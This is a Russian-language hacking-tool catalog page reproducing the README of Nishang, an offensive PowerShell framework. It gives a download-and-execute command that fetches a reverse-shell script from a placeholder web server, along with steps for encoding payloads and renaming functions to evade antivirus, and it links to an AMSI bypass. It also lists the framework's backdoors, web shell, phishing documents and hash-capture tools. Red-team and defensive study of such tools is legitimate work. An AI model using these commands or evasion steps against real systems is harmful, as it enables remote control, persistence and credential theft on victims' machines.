Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
nishang — Nishang - Атакующий PowerShell для красных команд, тестирования на проникновение и наступательной безопасности. | Kitploit
Инструменты/GitHubGitHub/samratashok/nishang
Взлом паролейИнструменты фишингаПовышение привилегийГенерация полезной нагрузкиЭксплуатацияЛатеральное перемещениеЭксфильтрация данныхСбор информацииПост-эксплуатацияТестирование на ПроникновениеКомандование и Управление
10.0k2.5k1283 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Red Teaming
GitHubsamratashok/nishang

nishang

Nishang - Атакующий PowerShell для красных команд, тестирования на проникновение и наступательной безопасности.

Репозиторий

Nishang

Nishang — это фреймворк и коллекция скриптов и полезных нагрузок, которые позволяют использовать PowerShell для наступательной безопасности, пентеста и red teaming. Nishang полезен на всех этапах пентеста.

Автор: Nikhil Mittal Основатель Altered Security — Hands-on red team and enterprise security training!

Использование

Импортируйте все скрипты в текущий сеанс PowerShell (PowerShell v3 и выше).

PS C:\nishang> Import-Module .\nishang.psm1

Используйте отдельные скрипты с dot sourcing.

PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

Чтобы получить справку по любому скрипту или функции, используйте:

PS C:\nishang> Get-Help [scriptname] -full

Обратите внимание, что справка доступна для функции, загруженной после запуска скрипта, а не для самого скрипта начиная с версии 0.3.8. Во всех случаях имя функции совпадает с именем скрипта.

Например, чтобы просмотреть справку по Get-WLAN-Keys.ps1, используйте

PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Антивирус

Скрипты Nishang многими антивирусами помечаются как вредоносные. Скрипты на цели предназначены для использования в памяти, что очень легко сделать с помощью PowerShell. Два основных метода выполнения скриптов PowerShell в памяти:

Метод 1. Использование загрузки и выполнения в памяти: Используйте следующую команду для выполнения скрипта PowerShell из удаленной оболочки, родной оболочки meterpreter, веб-оболочки и т.д., а также экспортируемой им функции. Все скрипты в Nishang экспортируют функцию с тем же именем в текущий сеанс PowerShell.

powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

Метод 2. Использование параметра -encodedcommand (или -e) PowerShell Все скрипты в Nishang экспортируют функцию с тем же именем в текущий сеанс PowerShell. Поэтому убедитесь, что вызов функции сделан в самом скрипте при использовании параметра encodedcommand из оболочки, отличной от PowerShell. Для приведенного выше примера добавьте вызов функции (без кавычек) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".

Закодируйте скрипт с помощью Invoke-Encode из Nishang:

PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand

Закодированные данные записаны в .\encoded.txt

Закодированная команда записана в .\encodedcommand.txt

Из указанного выше используйте закодированный скрипт из encodedcommand.txt и запустите его на цели, где могут выполняться команды (удаленная оболочка, родная оболочка meterpreter, веб-оболочка и т.д.). Используйте его следующим образом:

C:\Users\target> powershell -e [encodedscript]

Если скрипты по-прежнему обнаруживаются, поможет изменение имен функций и параметров, а также удаление содержимого справки.

Если AMSI в Windows 10 все еще блокирует выполнение скриптов, смотрите этот блог: http://www.labofapenetrationtester.com/2016/09/amsi.html

Скрипты

Nishang в настоящее время содержит следующие скрипты и полезные нагрузки.

ActiveDirectory

Set-DCShadowPermissions

Изменение объектов AD для предоставления минимальных разрешений, необходимых для DCShadow.

Antak — веб-оболочка

Antak

Выполнение скриптов PowerShell в памяти, выполнение команд, загрузка и скачивание файлов с помощью этой веб-оболочки.

Бэкдоры

HTTP-Backdoor

Бэкдор, который может получать инструкции от сторонних веб-сайтов и выполнять скрипты PowerShell в памяти.

DNS_TXT_Pwnage

Бэкдор, который может получать команды и скрипты PowerShell из DNS TXT-запросов, выполнять их на цели и удаленно управляться с помощью запросов.

Execute-OnTime

Бэкдор, который может выполнять скрипты PowerShell в заданное время на цели.

Gupt-Backdoor

Бэкдор, который может получать команды и скрипты из SSID WLAN без подключения к нему.

Add-ScrnSaveBackdoor

Бэкдор, который может использовать заставку Windows для удаленного выполнения команд и скриптов.

Invoke-ADSBackdoor

Бэкдор, который может использовать альтернативные потоки данных и реестр Windows для обеспечения постоянства.

Add-RegBackdoor

Бэкдор, использующий известный трюк с отладчиком для выполнения полезной нагрузки с помощью Sticky keys и Utilman (Windows key + U).

Set-RemoteWMI

Изменение разрешений пространств имен DCOM и WMI, чтобы предоставить доступ не-администратору.

Set-RemotePSRemoting

Изменение разрешений удаленного взаимодействия PowerShell, чтобы предоставить доступ не-администратору.

Bypass

Invoke-AmsiBypass

Реализация публично известных методов обхода/избегания AMSI.

Client

Out-CHM

Создание зараженных CHM-файлов, которые могут выполнять команды и скрипты PowerShell.

Out-Word

Создание Word-файлов и заражение существующих для выполнения команд и скриптов PowerShell.

Out-Excel

Создание Excel-файлов и заражение существующих для выполнения команд и скриптов PowerShell.

Out-HTA

Создание HTA-файла, который можно развернуть на веб-сервере и использовать в фишинговых кампаниях.

Out-Java

Создание подписанных JAR-файлов, которые можно использовать с апплетами для выполнения скриптов и команд.

Out-Shortcut

Создание файлов ярлыков, способных выполнять команды и скрипты PowerShell.

Out-WebQuery

Создание IQY-файлов для фишинга учетных данных и SMB-хешей.

Out-JS

Создание JS-файлов, способных выполнять команды и скрипты PowerShell.

Out-SCT

Создание SCT-файлов, способных выполнять команды и скрипты PowerShell.

Out-SCF

Создание SCF-файла, который можно использовать для перехвата вызовов NTLM-хешей.

Escalation

Enable-DuplicateToken

Когда требуются привилегии SYSTEM.

Remove-Update

Внедрение уязвимостей путем удаления исправлений.

Скачать инструмент